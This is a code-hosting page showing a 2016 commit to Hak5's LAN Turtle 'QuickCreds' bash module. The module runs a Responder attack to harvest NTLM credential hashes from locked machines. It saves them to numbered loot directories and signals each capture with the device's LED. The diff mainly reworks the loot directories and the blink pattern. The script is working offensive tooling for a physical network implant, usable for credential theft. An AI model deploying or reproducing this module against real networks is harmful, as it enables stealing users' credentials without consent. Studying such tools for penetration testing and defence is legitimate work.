hak5
/
lanturtle-modules
mirror of https://github.com/hak5/lanturtle-modules.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Version 1.1 

Fixes new directory creation in /root/loot and changes LED blink behavior to now rapidly blink when running and light solid when NTLM hashes have been saved.
pull/16/head
Darren Kitchen 2016-09-20 17:23:05 -07:00 committed by GitHub
parent 7749b58116
commit 6dba852882
1 changed files with 41 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

68
modules/QuickCreds
View File

@ -1,6 +1,6 @@
#!/bin/bash /usr/lib/turtle/turtle_module
VERSION="1.0"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. Upon capture of NTLM hash the amber LED will repeat a 3 blink pattern. Author: Hak5Darren. Credit: Mubix."
VERSION="1.1"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink rapidly while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
CONF=/tmp/QuickCreds.form
: ${DIALOG_OK=0}
@ -10,6 +10,11 @@ CONF=/tmp/QuickCreds.form
: ${DIALOG_ITEM_HELP=4}
: ${DIALOG_ESC=255}
function configure {
# dialog --title "QuickCreds" --msgbox "\n\
# Dependencies will be installed. An Internet connection is required.\n\
@ -86,27 +91,31 @@ Configuration complete. Creds will be saved to /root/loot\n\
Enable this module to have it start the attack on boot.\n" 9 72
}
function start {
# Stop on-off-on DHCP blink pattern script
echo "Stopping DHCP Detect Blink Script"
/etc/init.d/dhcp_detect stop
echo ""
echo "QuickCreds started."
echo "LED 3-blink pattern will repeat upon NTLM hash capture."
echo "LED will blink rapidly while QuickCreds is running."
echo "LED will light solid upon NTLM hash capture."
echo ""
echo "If starting this module from the Turtle Shell menu,"
echo "press CTRL+C to return."
echo "Starting attack..." >> /root/loot/responder.log
# Remove logs symlink
rm -rf /etc/turtle/Responder/logs
# Enumerate loot directory
# Create new numbered loot directory and symlink it from Responder logs
cd /root/loot
lastdir=$(ls -d [0-9][0-9][0-9][0-9] | tail -1)
# Create new loot numbered directory
newdir=$((++lastdir))
mkdir /root/loot/$(printf "%04u" $newdir)
# Create symlink
ln -s /root/loot/$(printf "%04u" $newdir) /etc/turtle/Responder/logs
dircount=$(ls -lad /root/loot/* | wc -l)
mkdir /root/loot/$((dircount))
rm /etc/turtle/Responder/logs
ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
# Stop dnsmasq
/etc/init.d/dnsmasq stop 1&> /dev/null
@ -121,30 +130,35 @@ if [ -e /etc/turtle/Responder/logs/*NTLM* ];
if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
then
echo "Creds saved!" >> /root/loot/responder.log
finished
fi
fi
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
/usr/bin/sleep 0.05
/usr/bin/sleep 0.04
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
/usr/bin/sleep 0.05
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
/usr/bin/sleep 0.05
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
/usr/bin/sleep 0.05
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
/usr/bin/sleep 0.05
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
/usr/bin/sleep 0.6
fi
sleep 1
/usr/bin/sleep 0.04
done
}
function finished {
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
exit
}
function stop {
kill $(ps | grep [R]esponder | awk {'print $1'})
/etc/init.d/dnsmasq start 1&> /dev/null
echo "QuickCreds Stopped"
}
function status {
if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
}